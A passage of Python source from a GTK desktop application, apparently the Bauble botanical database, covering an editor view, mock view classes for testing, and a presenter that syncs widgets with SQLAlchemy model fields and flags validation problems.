obj == widget:\n widget.disconnect(sid)\n removed.append((obj, sid))\n\n for item in removed:\n self.__attached_signals.remove(item)\n\n def get_window(self):\n \"\"\"\n Return the top level window for view\n \"\"\"\n if self.root_widget_name is not None:\n return getattr(self.widgets, self.root_widget_name)\n else:\n raise NotImplementedError\n\n def __get_widget(self, widget):\n p = widget\n if isinstance(widget, Gtk.Widget):\n return widget\n elif isinstance(widget, tuple):\n if len(widget) == 1:\n return self.__get_widget(widget[0])\n parent, widget = widget[:-1], widget[-1]\n parent = self.__get_widget(parent)\n for c in parent.get_children():\n if Gtk.Buildable.get_name(c) == widget:\n return c\n else:\n return self.widgets[widget]\n logger.warning('cannot solve widget reference %s' % str(p))\n return None\n\n def widget_append_page(self, widget, page, label):\n widget = self.__get_widget(widget)\n widget.append_page(page, label)\n\n def widget_add(self, widget, child):\n widget = self.__get_widget(widget)\n widget.add(child)\n\n def widget_get_model(self, widget):\n widget = self.__get_widget(widget)\n return widget.get_model()\n\n def widget_grab_focus(self, widget):\n widget = self.__get_widget(widget)\n return widget.grab_focus()\n\n def widget_get_active(self, widget):\n widget = self.__get_widget(widget)\n return widget.get_active()\n\n def widget_set_active(self, widget, active=True):\n widget = self.__get_widget(widget)\n return widget.set_active(active)\n\n def widget_set_attributes(self, widget, attribs):\n widget = self.__get_widget(widget)\n return widget.set_attributes(attribs)\n\n def widget_set_inconsistent(self, widget, value):\n widget = self.__get_widget(widget)\n widget.set_inconsistent(value)\n\n def combobox_init(self, widget, values=None, cell_data_func=None):\n combo = self.__get_widget(widget)\n model = Gtk.ListStore(str)\n combo.clear()\n combo.set_model(model)\n renderer = Gtk.CellRendererText()\n combo.pack_start(renderer, True)\n combo.add_attribute(renderer, 'text', 0)\n self.combobox_setup(combo, values, cell_data_func)\n\n def combobox_setup(self, combo, values, cell_data_func):\n if values is None:\n return\n return utils.setup_text_combobox(combo, values, cell_data_func)\n\n def combobox_remove(self, widget, item):\n widget = self.__get_widget(widget)\n if isinstance(item, str):\n # remove matching\n model = widget.get_model()\n for i, row in enumerate(model):\n if item == row[0]:\n widget.remove_text(i)\n break\n logger.warning(\"combobox_remove - not found >%s<\" % item)\n elif isinstance(item, int):\n # remove at position\n widget.remove_text(item)\n else:\n logger.warning('invoked combobox_remove with item=(%s)%s' %\n (type(item), item))\n\n def combobox_append_text(self, widget, value):\n widget = self.__get_widget(widget)\n widget.append_text(value)\n\n def combobox_prepend_text(self, widget, value):\n widget = self.__get_widget(widget)\n widget.prepend_text(value)\n\n def combobox_get_active_text(self, widget):\n widget = self.__get_widget(widget)\n return widget.get_active_text()\n\n def combobox_get_active(self, widget):\n widget = self.__get_widget(widget)\n return widget.get_active()\n\n def combobox_set_active(self, widget, index):\n widget = self.__get_widget(widget)\n widget.set_active(index)\n\n def combobox_get_model(self, widget):\n 'get the list of values in the combo'\n widget = self.__get_widget(widget)\n return widget.get_model()\n\n def widget_emit(self, widget, value):\n widget = self.__get_widget(widget)\n widget.emit(value)\n\n def widget_set_expanded(self, widget, value):\n widget = self.__get_widget(widget)\n widget.set_expanded(value)\n\n def widget_set_sensitive(self, widget, value=True):\n widget = self.__get_widget(widget)\n widget.set_sensitive(value and True or False)\n\n def widget_set_visible(self, widget, visible=True):\n widget = self.__get_widget(widget)\n widget.set_visible(visible)\n\n def widget_get_visible(self, widget):\n widget = self.__get_widget(widget)\n return widget.get_visible()\n\n def widget_set_text(self, widget, text):\n widget = self.__get_widget(widget)\n widget.set_text(text)\n\n def widget_get_text(self, widget):\n widget = self.__get_widget(widget)\n return widget.get_text()\n\n def widget_get_value(self, widget, index=0):\n widget = self.__get_widget(widget)\n return utils.get_widget_value(widget, index)\n\n def widget_set_value(self, widget, value, markup=False, default=None,\n index=0):\n '''\n :param widget: a widget or name of a widget in self.widgets\n :param value: the value to put in the widgets\n :param markup: whether the data in value uses pango markup\n :param default: the default value to put in the widget if value is None\n :param index: the row index to use for those widgets who use a model\n\n This method calls bauble.utils.set_widget_value()\n '''\n if isinstance(widget, Gtk.Widget):\n utils.set_widget_value(widget, value, markup, default, index)\n else:\n utils.set_widget_value(self.widgets[widget], value, markup,\n default, index)\n\n def on_dialog_response(self, dialog, response, *args):\n '''\n Called if self.get_window() is a Gtk.Dialog and it receives\n the response signal.\n '''\n logger.debug('on_dialog_response')\n dialog.hide()\n self.response = response\n return response\n\n def on_dialog_close(self, dialog, event=None):\n \"\"\"\n Called if self.get_window() is a Gtk.Dialog and it receives\n the close signal.\n \"\"\"\n logger.debug('on_dialog_close')\n dialog.hide()\n return False\n\n def on_window_delete(self, window, event=None):\n \"\"\"\n Called when the window return by get_window() receives the\n delete event.\n \"\"\"\n logger.debug('on_window_delete')\n window.hide()\n return False\n\n def attach_completion(self, entry,\n cell_data_func=default_completion_cell_data_func,\n match_func=default_completion_match_func,\n minimum_key_length=2,\n text_column=-1):\n \"\"\"\n Attach an entry completion to a Gtk.Entry. The defaults\n values for this attach_completion assumes the completion popup\n only shows text and that the text is in the first column of\n the model.\n\n Return the completion attached to the entry.\n\n NOTE: If you are selecting completions from strings in your model\n you must set the text_column parameter to the column in the\n model that holds the strings or else when you select the string\n from the completions it won't get set properly in the entry\n even though you call entry.set_text().\n\n :param entry: the name of the entry to attach the completion\n\n :param cell_data_func: the function to use to display the rows in\n the completion popup\n\n :param match_func: a function that returns True/False if the\n value from the model should be shown in the completions\n\n :param minimum_key_length: default=2\n\n :param text_column: the value of the text-column property on the entry,\n default is -1\n \"\"\"\n\n # TODO: we should add a default ctrl-space to show the list of\n # completions regardless of the length of the string\n completion = Gtk.EntryCompletion()\n cell = Gtk.CellRendererText() # set up the completion renderer\n completion.pack_start(cell, True)\n completion.set_cell_data_func(cell, cell_data_func)\n completion.set_match_func(match_func)\n completion.set_property('text-column', text_column)\n completion.set_minimum_key_length(minimum_key_length)\n completion.set_popup_completion(True)\n completion.props.popup_set_width = False\n if isinstance(entry, str):\n self.widgets[entry].set_completion(completion)\n else:\n entry.set_completion(completion)\n\n # allow later access to the match func just in case\n completion._match_func = match_func\n\n return completion\n\n # TODO: add a default value to set in the combo\n def init_translatable_combo(self, combo, translations, default=None,\n cmp=None):\n \"\"\"\n Initialize a Gtk.ComboBox with translations values where\n model[row][0] is the value that will be stored in the database\n and model[row][1] is the value that will be visible in the\n Gtk.ComboBox.\n\n A Gtk.ComboBox initialized with this method should work with\n self.assign_simple_handler()\n\n :param combo:\n :param translations: a list of pairs, or a dictionary,\n of values->translation.\n \"\"\"\n if isinstance(combo, str):\n combo = self.widgets[combo]\n combo.clear()\n # using 'object' avoids SA unicode warning\n model = Gtk.ListStore(object, str)\n if isinstance(translations, dict):\n translations = sorted(translations.items(),\n key=lambda x: (x[1] != None, x[1]))\n if cmp is not None:\n translations = sorted(translations,\n key=lambda a: (a[0] != None, a[0]))\n for key, value in translations:\n model.append([key, value])\n combo.set_model(model)\n cell = Gtk.CellRendererText()\n combo.pack_start(cell, True)\n combo.add_attribute(cell, 'text', 1)\n\n def save_state(self):\n '''\n Save the state of the view by setting a value in the preferences\n that will be called restored in restore_state\n e.g. prefs[pref_string] = pref_value\n '''\n pass\n\n def restore_state(self):\n '''\n Restore the state of the view, this is usually done by getting a value\n by the preferences and setting the equivalent in the interface\n '''\n pass\n\n def start(self):\n ## while being ran, the view will invoke callbacks in the presenter\n ## which, in turn, will alter the attributes in the model.\n return self.get_window().run()\n\n def cleanup(self):\n \"\"\"\n Should be called when after self.start() returns.\n\n By default all it does is call self.disconnect_all()\n \"\"\"\n self.disconnect_all()\n\n def mark_problem(self, widget):\n pass\n\n\nclass MockDialog:\n def __init__(self):\n self.hidden = False\n self.content_area = Gtk.VBox()\n\n def hide(self):\n self.hidden = True\n\n def run(self):\n pass\n\n def show(self):\n pass\n\n def add_accel_group(self, group):\n pass\n\n def get_content_area(self):\n return self.content_area\n\n\nclass MockView:\n '''mocking the view, but so generic that we share it among clients\n '''\n def __init__(self, **kwargs):\n self.widgets = type('MockWidgets', (object, ), {})()\n self.models = {} # dictionary of list of tuples\n self.invoked = []\n self.invoked_detailed = []\n self.visible = {}\n self.sensitive = {}\n self.expanded = {}\n self.values = {}\n self.index = {}\n self.selection = []\n self.reply_entry_dialog = []\n self.reply_yes_no_dialog = []\n self.reply_file_chooser_dialog = []\n self.__window = MockDialog()\n for name, value in list(kwargs.items()):\n setattr(self, name, value)\n self.boxes = set()\n\n def init_translatable_combo(self, *args):\n self.invoked.append('init_translatable_combo')\n self.invoked_detailed.append((self.invoked[-1], args))\n pass\n\n def get_selection(self):\n 'fakes main UI search result - selection'\n return self.selection\n\n def image_set_from_file(self, *args):\n self.invoked.append('image_set_from_file')\n self.invoked_detailed.append((self.invoked[-1], args))\n pass\n\n def run_file_chooser_dialog(\n self, text, parent, action, buttons, last_folder, target):\n args = [text, parent, action, buttons, last_folder, target]\n self.invoked.append('run_file_chooser_dialog')\n self.invoked_detailed.append((self.invoked[-1], args))\n try:\n reply = self.reply_file_chooser_dialog.pop()\n except:\n reply = ''\n self.widget_set_value(target, reply)\n\n def run_entry_dialog(self, *args, **kwargs):\n self.invoked.append('run_entry_dialog')\n self.invoked_detailed.append((self.invoked[-1], args))\n try:\n return self.reply_entry_dialog.pop()\n except:\n return ''\n\n def run_message_dialog(self, msg, type=Gtk.MessageType.INFO,\n buttons=Gtk.ButtonsType.OK, parent=None):\n self.invoked.append('run_message_dialog')\n args = [msg, type, buttons, parent]\n self.invoked_detailed.append((self.invoked[-1], args))\n\n def run_yes_no_dialog(self, msg, parent=None, yes_delay=-1):\n self.invoked.append('run_yes_no_dialog')\n args = [msg, parent, yes_delay]\n self.invoked_detailed.append((self.invoked[-1], args))\n try:\n return self.reply_yes_no_dialog.pop()\n except:\n return True\n\n def set_title(self, *args):\n self.invoked.append('set_title')\n self.invoked_detailed.append((self.invoked[-1], args))\n pass\n\n def set_icon(self, *args):\n self.invoked.append('set_icon')\n self.invoked_detailed.append((self.invoked[-1], args))\n pass\n\n def combobox_init(self, name, values=None, *args):\n self.invoked.append('combobox_init')\n self.invoked_detailed.append((self.invoked[-1], [name, values, args]))\n self.models[name] = []\n for i in values or []:\n self.models[name].append((i, ))\n\n def connect_signals(self, *args):\n self.invoked.append('connect_signals')\n self.invoked_detailed.append((self.invoked[-1], args))\n pass\n\n def set_label(self, *args):\n self.invoked.append('set_label')\n self.invoked_detailed.append((self.invoked[-1], args))\n pass\n\n def connect_after(self, *args):\n self.invoked.append('connect_after')\n self.invoked_detailed.append((self.invoked[-1], args))\n pass\n\n def widget_get_value(self, widget, *args):\n self.invoked.append('widget_get_value')\n self.invoked_detailed.append((self.invoked[-1], [widget, args]))\n return self.values.get(widget)\n\n def widget_set_value(self, widget, value, *args):\n self.invoked.append('widget_set_value')\n self.invoked_detailed.append((self.invoked[-1], [widget, value, args]))\n self.values[widget] = value\n if widget in self.models:\n if (value, ) in self.models[widget]:\n self.index[widget] = self.models[widget].index((value, ))\n else:\n self.index[widget] = -1\n\n def connect(self, *args):\n self.invoked.append('connect')\n self.invoked_detailed.append((self.invoked[-1], args))\n pass\n\n def widget_get_visible(self, name):\n self.invoked.append('widget_get_visible')\n self.invoked_detailed.append((self.invoked[-1], [name]))\n return self.visible.get(name)\n\n def widget_set_visible(self, name, value=True):\n self.invoked.append('widget_set_visible')\n self.invoked_detailed.append((self.invoked[-1], [name, value]))\n self.visible[name] = value\n\n def widget_set_expanded(self, widget, value):\n self.invoked.append('widget_set_expanded')\n self.invoked_detailed.append((self.invoked[-1], [widget, value]))\n self.expanded[widget] = value\n\n def widget_set_sensitive(self, name, value=True):\n self.invoked.append('widget_set_sensitive')\n self.invoked_detailed.append((self.invoked[-1], [name, value]))\n self.sensitive[name] = value and True or False\n\n def widget_get_sensitive(self, name):\n self.invoked.append('widget_get_sensitive')\n self.invoked_detailed.append((self.invoked[-1], [name]))\n return self.sensitive[name]\n\n def widget_set_inconsistent(self, *args):\n self.invoked.append('widget_set_inconsistent')\n self.invoked_detailed.append((self.invoked[-1], args))\n pass\n\n def widget_get_text(self, widget, *args):\n self.invoked.append('widget_get_text')\n self.invoked_detailed.append((self.invoked[-1], [widget, args]))\n return self.values[widget]\n\n def widget_set_text(self, *args):\n self.invoked.append('widget_set_text')\n self.invoked_detailed.append((self.invoked[-1], args))\n self.values[args[0]] = args[1]\n\n def widget_grab_focus(self, *args):\n self.invoked.append('widget_grab_focus')\n self.invoked_detailed.append((self.invoked[-1], args))\n\n def widget_set_active(self, *args):\n self.invoked.append('widget_set_active')\n self.invoked_detailed.append((self.invoked[-1], args))\n\n def widget_set_attributes(self, *args):\n self.invoked.append('widget_set_attributes')\n self.invoked_detailed.append((self.invoked[-1], args))\n\n def get_window(self):\n self.invoked.append('get_window')\n self.invoked_detailed.append((self.invoked[-1], []))\n return self.__window\n\n widget_get_active = widget_get_value\n\n def combobox_remove(self, name, item):\n self.invoked.append('combobox_remove')\n self.invoked_detailed.append((self.invoked[-1], [name, item]))\n model = self.models.setdefault(name, [])\n if isinstance(item, int):\n del model[item]\n else:\n model.remove((item, ))\n\n def combobox_append_text(self, name, value):\n self.invoked.append('combobox_append_text')\n self.invoked_detailed.append((self.invoked[-1], [name, value]))\n model = self.models.setdefault(name, [])\n model.append((value, ))\n\n def combobox_prepend_text(self, name, value):\n self.invoked.append('combobox_prepend_text')\n self.invoked_detailed.append((self.invoked[-1], [name, value]))\n model = self.models.setdefault(name, [])\n model.insert(0, (value, ))\n\n def combobox_set_active(self, widget, index):\n self.invoked.append('combobox_set_active')\n self.invoked_detailed.append((self.invoked[-1], [widget, index]))\n self.index[widget] = index\n self.values[widget] = self.models[widget][index][0]\n\n def combobox_get_active_text(self, widget):\n self.invoked.append('combobox_get_active_text')\n self.invoked_detailed.append((self.invoked[-1], [widget, ]))\n return self.values[widget]\n\n def combobox_get_active(self, widget):\n self.invoked.append('combobox_get_active')\n self.invoked_detailed.append((self.invoked[-1], [widget, ]))\n return self.index.setdefault(widget, 0)\n\n def combobox_get_model(self, widget):\n self.invoked.append('combobox_get_model')\n self.invoked_detailed.append((self.invoked[-1], [widget, ]))\n return self.models[widget]\n\n def set_accept_buttons_sensitive(self, sensitive=True):\n self.invoked.append('set_accept_buttons_sensitive')\n self.invoked_detailed.append((self.invoked[-1], [sensitive, ]))\n pass\n\n def mark_problem(self, widget):\n pass\n\n def add_message_box(self, message_box_type=utils.MESSAGE_BOX_INFO):\n self.invoked.append('set_accept_buttons_sensitive')\n self.invoked_detailed.append((self.invoked[-1], [message_box_type, ]))\n return MockDialog()\n\n def add_box(self, box):\n self.invoked.append('add_box')\n self.invoked_detailed.append((self.invoked[-1], [box, ]))\n self.boxes.add(box)\n\n def remove_box(self, box):\n self.invoked.append('remove_box')\n self.invoked_detailed.append((self.invoked[-1], [box, ]))\n if box in self.boxes:\n self.boxes.remove(box)\n\n\nclass DontCommitException(Exception):\n \"\"\"\n This is used for GenericModelViewPresenterEditor.commit_changes() to\n signal that for some reason the editor doesn't want to commit the current\n values and would like to redisplay\n \"\"\"\n pass\n\n\nclass GenericEditorPresenter(object):\n \"\"\"\n The presenter of the Model View Presenter Pattern\n\n :param model: an object instance mapped to an SQLAlchemy table\n :param view: should be an instance of GenericEditorView\n\n The presenter should usually be initialized in the following order:\n 1. initialize the widgets\n 2. refresh the view, put values from the model into the widgets\n 3. connect the signal handlers\n \"\"\"\n problem_color = Gdk.color_parse('#FFDCDF')\n widget_to_field_map = {}\n view_accept_buttons = []\n\n PROBLEM_DUPLICATE = random()\n PROBLEM_EMPTY = random()\n\n def __init__(self, model, view, refresh_view=False, session=None,\n do_commit=False, committing_results=[Gtk.ResponseType.OK]):\n self.model = model\n self.view = view\n self.problems = set()\n self._dirty = False\n self.is_committing_presenter = do_commit\n self.committing_results = committing_results\n self.running_threads = []\n self.owns_session = False\n self.session = session\n self.clipboard_presenters = []\n if not hasattr(self.__class__, 'clipboard'):\n logging.debug('creating clipboard in presenter class %s' % self.__class__.__name__)\n self.__class__.clipboard = {}\n\n if session is None:\n try:\n self.session = object_session(model)\n except Exception as e:\n logger.debug(\"GenericEditorPresenter::__init__ - %s, %s\" % (type(e), e))\n\n if self.session is None: # object_session gave None without error\n if db.Session is not None:\n self.session = db.Session()\n self.owns_session = True\n if isinstance(model, db.Base):\n self.model = model = self.session.merge(model)\n else:\n logger.debug('db.Session was None, I cannot get a session.')\n self.session = None\n\n if view:\n view.accept_buttons = self.view_accept_buttons\n if model and refresh_view:\n self.refresh_view()\n view.connect_signals(self)\n\n def create_toolbar(self, *args, **kwargs):\n view, model = self.view, self.model\n logging.debug('creating toolbar in content_area presenter %s' % self.__class__.__name__)\n actiongroup = Gtk.ActionGroup('window-clip-actions')\n accelgroup = Gtk.AccelGroup()\n fake_toolbar = Gtk.Toolbar()\n fake_toolbar.set_name('toolbar')\n view.get_window().add_accel_group(accelgroup)\n view.get_window().get_content_area().pack_start(fake_toolbar, True, True, 0)\n for shortcut, cb in (('c', self.on_window_clip_copy),\n ('v', self.on_window_clip_paste)):\n action = Gtk.Action(shortcut, shortcut, 'clip-action', None)\n actiongroup.add_action_with_accel(action, shortcut)\n action.connect(\"activate\", cb)\n action.set_accel_group(accelgroup)\n action.connect_accelerator()\n toolitem = action.create_tool_item()\n fake_toolbar.insert(toolitem, -1)\n fake_toolbar.set_visible(False)\n self.clipboard_presenters.append(self)\n\n def register_clipboard(self):\n parent = self.parent_ref()\n parent.clipboard_presenters.append(self)\n\n def on_window_clip_copy(self, widget, *args, **kwargs):\n try:\n notebook = self.view.widgets['notebook']\n current_page_no = notebook.get_current_page()\n current_page_widget = notebook.get_nth_page(current_page_no)\n except:\n notebook = None\n current_page_widget = self.view.get_window().get_content_area()\n for presenter in self.clipboard_presenters:\n for name in presenter.widget_to_field_map:\n container = presenter.view.widgets[name]\n while container.get_parent() != notebook:\n if current_page_widget == container:\n break\n container = container.get_parent()\n if current_page_widget == container:\n value = presenter.view.widget_get_value(name)\n logger.debug('writing »%s« in clipboard %s for %s' % (value, presenter.__class__.__name__, name))\n presenter.clipboard[name] = value\n\n def on_window_clip_paste(self, widget, *args, **kwargs):\n try:\n notebook = self.view.widgets['notebook']\n current_page_no = notebook.get_current_page()\n current_page_widget = notebook.get_nth_page(current_page_no)\n except:\n notebook = None\n current_page_widget = self.view.get_window().get_content_area()\n for presenter in self.clipboard_presenters:\n for name in presenter.widget_to_field_map:\n container = presenter.view.widgets[name]\n while container.get_parent() != notebook:\n if current_page_widget == container:\n break\n container = container.get_parent()\n if current_page_widget == container:\n if presenter.view.widget_get_value(name):\n logger.debug('skipping %s in clipboard %s because widget has value' % (name, presenter.__class__.__name__))\n continue\n clipboard_value = presenter.clipboard.get(name)\n if not clipboard_value:\n logger.debug('skipping %s because clipboard %s has no value' % (name, presenter.__class__.__name__))\n continue\n logger.debug('setting »%s« from clipboard %s for %s' % (clipboard_value, presenter.__class__.__name__, name))\n presenter.view.widget_set_value(name, clipboard_value)\n\n def refresh_sensitivity(self):\n logger.debug('you should implement this in your subclass')\n\n def refresh_view(self):\n '''fill the values in the widgets as the field values in the model\n\n for radio button groups, we have several widgets all referring\n to the same model attribute.\n\n '''\n for widget, attr in list(self.widget_to_field_map.items()):\n value = getattr(self.model, attr)\n value = (value is not None) and value or ''\n self.view.widget_set_value(widget, value)\n\n def cancel_threads(self):\n for k in self.running_threads:\n try:\n k.cancel()\n except:\n pass\n for k in self.running_threads:\n k.join()\n self.running_threads = []\n\n def start_thread(self, thread):\n self.running_threads.append(thread)\n thread.start()\n return thread\n\n def idle_start_thread(self, cls, *args, **kwargs):\n def create_and_start(cls, args, kwargs):\n thread = cls(*args, **kwargs)\n self.running_threads.append(thread)\n thread.start()\n GObject.idle_add(create_and_start, cls, args, kwargs)\n\n def commit_changes(self):\n '''\n Commit the changes to self.session()\n '''\n objs = list(self.session)\n try:\n self.session.commit()\n try:\n bauble.gui.get_view().update()\n except Exception as e:\n pass\n except Exception as e:\n self.session.rollback()\n self.session.add_all(objs)\n raise\n finally:\n if self.owns_session:\n self.session.close()\n return True\n\n def __set_model_attr(self, attr, value):\n if getattr(self.model, attr) != value:\n setattr(self.model, attr, value)\n self._dirty = True\n self.view._dirty = True\n self.view.set_accept_buttons_sensitive(not self.has_problems())\n\n def __get_widget_name(self, widget):\n return (isinstance(widget, str)\n and widget\n or Gtk.Buildable.get_name(widget))\n\n widget_get_name = __get_widget_name\n\n def __get_widget_attr(self, widget):\n return self.widget_to_field_map.get(self.__get_widget_name(widget))\n\n def on_textbuffer_changed(self, widget, value=None, attr=None):\n \"\"\"handle 'changed' signal on textbuffer widgets.\n\n this will not work directly. check the unanswered question\n http://stackoverflow.com/questions/32106765/\n\n to use it, you need pass the `attr` yourself.\n \"\"\"\n\n if attr is None:\n attr = self.__get_widget_attr(widget)\n if attr is None:\n return\n if value is None:\n value = widget.props.text\n value = value and utils.utf8(value) or None\n logger.debug(\"on_text_entry_changed(%s, %s) - %s → %s\"\n % (widget, attr, getattr(self.model, attr), value))\n self.__set_model_attr(attr, value)\n\n def on_text_entry_changed(self, widget, value=None):\n \"handle 'changed' signal on generic text entry widgets.\"\n\n attr = self.__get_widget_attr(widget)\n if attr is None:\n return\n value = self.view.widget_get_value(widget)\n logger.debug(\"on_text_entry_changed(%s, %s) - %s → %s\"\n % (widget, attr, getattr(self.model, attr), value))\n self.__set_model_attr(attr, value)\n return value\n\n def on_numeric_text_entry_changed(self, widget, value=None):\n \"\"\"handle 'changed' signal on numeric text entry widgets.\n\n if the widget is associated to a model attribute, new value is\n type-checked. as long as the user types digits, they are accepted.\n whatever else gets ignored.\n\n \"\"\"\n attr = self.__get_widget_attr(widget)\n if attr is None:\n return\n value = self.view.widget_get_value(widget)\n if value == '':\n value = 0\n try:\n value = int(value)\n self.__set_model_attr(attr, value)\n except:\n value = getattr(self.model, attr)\n self.view.widget_set_value(widget, value)\n return value\n\n def on_non_empty_text_entry_changed(self, widget, value=None):\n \"handle 'changed' signal on compulsory text entry widgets.\"\n\n value = self.on_text_entry_changed(widget, value)\n if not value:\n self.add_problem(self.PROBLEM_EMPTY, widget)\n else:\n self.remove_problem(self.PROBLEM_EMPTY, widget)\n return value\n\n def on_unique_text_entry_changed(self, widget, value=None):\n \"handle 'changed' signal on text entry widgets with an uniqueness \"\n \"constraint.\"\n\n attr = self.__get_widget_attr(widget)\n if attr is None:\n return\n if value is None:\n value = widget.props.text\n value = value and utils.utf8(value) or None\n if not value:\n self.add_problem(self.PROBLEM_EMPTY, widget)\n else:\n self.remove_problem(self.PROBLEM_EMPTY, widget)\n if getattr(self.model, attr) == value:\n return\n logger.debug(\"on_unique_text_entry_changed(%s, %s) - %s → %s\"\n % (widget, attr, getattr(self.model, attr), value))\n ## check uniqueness\n klass = self.model.__class__\n k_attr = getattr(klass, attr)\n q = self.session.query(klass)\n q = q.filter(k_attr == value)\n omonym = q.first()\n if omonym is not None and omonym is not self.model:\n self.add_problem(self.PROBLEM_DUPLICATE, widget)\n else:\n self.remove_problem(self.PROBLEM_DUPLICATE, widget)\n ## ok\n self.__set_model_attr(attr, value)\n\n def on_datetime_entry_changed(self, widget, value=None):\n \"handle 'changed' signal on datetime entry widgets.\"\n\n attr = self.__get_widget_attr(widget)\n logger.debug(\"on_datetime_entry_changed(%s, %s)\" % (widget, attr))\n if value is None:\n value = widget.props.text\n value = value and utils.utf8(value) or None\n self.__set_model_attr(attr, value)\n\n def on_check_toggled(self, widget, value=None):\n \"handle toggled signal on check buttons\"\n attr = self.__get_widget_attr(widget)\n if value is None:\n value = self.view.widget_get_active(widget)\n self.view.widget_set_inconsistent(widget, False)\n if attr is not None:\n self.__set_model_attr(attr, value)\n else:\n logging.debug(\"presenter %s does not know widget %s\" % (\n self.__class__.__name__, self.__get_widget_name(widget)))\n\n on_chkbx_toggled = on_check_toggled\n\n def on_relation_entry_changed(self, widget, value=None):\n attr = self.__get_widget_attr(widget)\n logger.debug(\n 'calling unimplemented on_relation_entry_changed(%s, %s, %s(%s))'\n % (widget, attr, type(value), value))\n\n def on_group_changed(self, widget, *args):\n \"handle group-changed signal on radio-button\"\n if args:\n logger.warning(\"on_group_changed received extra arguments\" +\n str(args))\n attr = self.__get_widget_attr(widget)\n value = self.__get_widget_name(widget)\n self.__set_model_attr(attr, value)\n\n def on_combo_changed(self, widget, value=None, *args):\n \"\"\"handle changed signal on combo box\n\n value is only specified while testing\"\"\"\n attr = self.__get_widget_attr(widget)\n if value is None:\n index = self.view.combobox_get_active(widget)\n widget_model = self.view.combobox_get_model(widget)\n value = widget_model[index][0]\n self.__set_model_attr(attr, value)\n self.refresh_view()\n\n def dirty(self):\n logger.info('calling deprecated \"dirty\". use \"is_dirty\".')\n return self.is_dirty()\n\n # whether the presenter should be commited or not\n def is_dirty(self):\n \"\"\"is the presenter dirty?\n\n the presenter is dirty depending on whether it has changed anything\n that needs to be committed. This doesn't necessarily imply that the\n session is not dirty nor is it required to change back to True if\n the changes are committed.\n \"\"\"\n return self._dirty\n\n def has_problems(self, widget=None):\n \"\"\"\n Return True/False depending on if widget has any problems\n attached to it. if no widget is specified, result is True if\n there is any problem at all.\n \"\"\"\n if widget is None:\n return self.problems and True or False\n for p, w in self.problems:\n if widget == w:\n return True\n return False\n\n def clear_problems(self):\n \"\"\"\n Clear all the problems from all widgets associated with the presenter\n \"\"\"\n tmp = self.problems.copy()\n list(map(lambda p: self.remove_problem(p[0], p[1]), tmp))\n self.problems.clear()\n\n def remove_problem(self, problem_id, widget=None):\n \"\"\"\n Remove problem_id from self.problems and reset the background\n color of the widget(s) in problem_widgets. If problem_id is\n None and problem_widgets is None then method won't do anything.\n\n :param problem_id: the problem to remove, if None then remove\n any problem from the problem_widget(s)\n\n :param problem_widgets: a Gtk.Widget instance to remove the problem\n from, if None then remove all occurrences of problem_id regardless\n of the widget\n \"\"\"\n logger.debug('remove_problem(%s, %s, %s)' %\n (self, problem_id, widget))\n if problem_id is None and widget is None:\n logger.warning('invoke remove_problem with None, None')\n # if no problem id and not problem widgets then don't do anything\n return\n\n if not isinstance(widget, (Gtk.Widget, type(None))):\n try:\n widget = getattr(self.view.widgets, widget)\n except:\n logger.info(\"can't get widget %s\" % widget)\n\n tmp = self.problems.copy()\n for p, w in tmp:\n if (w == widget and p == problem_id) or \\\n (widget is None and p == problem_id) or \\\n (w == widget and problem_id is None):\n if w and not prefs.testing:\n w.modify_bg(Gtk.StateType.NORMAL, None)\n w.modify_base(Gtk.StateType.NORMAL, None)\n w.queue_draw()\n self.problems.remove((p, w))\n logger.debug('problems now: %s' % self.problems)\n\n def add_problem(self, problem_id, problem_widgets=None):\n \"\"\"\n Add problem_id to self.problems and change the background of widget(s)\n in problem_widgets.\n\n :param problem_id: A unique id for the problem.\n\n :param problem_widgets: either a widget or list of widgets\n whose background color should change to indicate a problem\n (default=None)\n \"\"\"\n ## map case list of widget to list of cases single widget.\n logger.debug('add_problem(%s, %s, %s)' %\n (self, problem_id, problem_widgets))\n if isinstance(problem_widgets, (tuple, list)):\n list(map(lambda w: self.add_problem(problem_id, w), problem_widgets))\n return\n\n ## here single widget.\n widget = problem_widgets\n if not isinstance(widget, Gtk.Widget):\n try:\n widget = getattr(self.view.widgets, widget)\n except:\n logger.info(\"can't get widget %s\" % widget)\n self.problems.add((problem_id, widget))\n if isinstance(widget, str):\n self.view.mark_problem(widget)\n elif widget is not None:\n widget.modify_bg(Gtk.StateType.NORMAL, self.problem_color)\n widget.modify_base(Gtk.StateType.NORMAL, self.problem_color)\n widget.queue_draw()\n logger.debug('problems now: %s' % self.problems)\n\n def init_enum_combo(self, widget_name, field):\n \"\"\"\n Initialize a Gtk.ComboBox widget with name widget_name from\n enum values in self.model.field\n\n :param widget_name:\n\n :param field:\n \"\"\"\n combo = self.view.widgets[widget_name]\n mapper = object_mapper(self.model)\n values = mapper.c[field].type.values\n if None in values:\n logger.debug(\"None value found in column %s, that is not in the Enum\" % field)\n values.remove(None)\n values.insert(0, '')\n values = sorted(values)\n utils.setup_text_combobox(combo, values)\n\n def set_model_attr(self, attr, value, validator=None):\n \"\"\"\n It is best to use this method to set values on the model\n rather than setting them directly. Derived classes can\n override this method to take action when the model changes.\n\n :param attr: the attribute on self.model to set\n :param value: the value the attribute will be set to\n :param validator: validates the value before setting it\n \"\"\"\n logger.debug('editor.set_model_attr(%s, %s)' % (attr, value))\n if validator:\n try:\n logger.debug(\"validating %s(%s) for %s using %s\" % (type(value).__name__, value, attr, validator.wrapped))\n value = validator.to_python(value)\n self.remove_problem('BAD_VALUE_%s' % attr)\n except ValidatorError as e:\n logger.debug(\"GenericEditorPresenter.set_model_attr %s\" % e)\n self.add_problem('BAD_VALUE_%s' % attr)\n else:\n logger.debug(\"validated %s(%s) for %s\" % (type(value).__name__, value, attr))\n setattr(self.model, attr, value)\n else:\n setattr(self.model, attr, value)\n\n def assign_simple_handler(self, widget_name, model_attr, validator=None):\n '''\n Assign handlers to widgets to change fields in the model.\n\n :param widget_name:\n\n :param model_attr:\n\n :param validator:\n\n Note: Where widget is a Gtk.ComboBox or Gtk.ComboBoxEntry then\n the value is assumed to be stored in model[row][0]\n '''\n widget = self.view.widgets[widget_name]\n check(widget is not None, _('no widget with name %s') % widget_name)\n\n class ProblemValidator(Validator):\n\n def __init__(self, presenter, wrapped):\n self.presenter = presenter\n self.wrapped = wrapped\n\n def to_python(self, value):\n try:\n value = self.wrapped.to_python(value)\n self.presenter.remove_problem('BAD_VALUE_%s'\n % model_attr, widget)\n except Exception as e:\n logger.debug(\"GenericEditorPresenter.ProblemValidator\"\n \".to_python %s\" % e)\n self.presenter.add_problem('BAD_VALUE_%s'\n % model_attr, widget)\n raise\n return value\n\n if validator:\n validator = ProblemValidator(presenter=self, 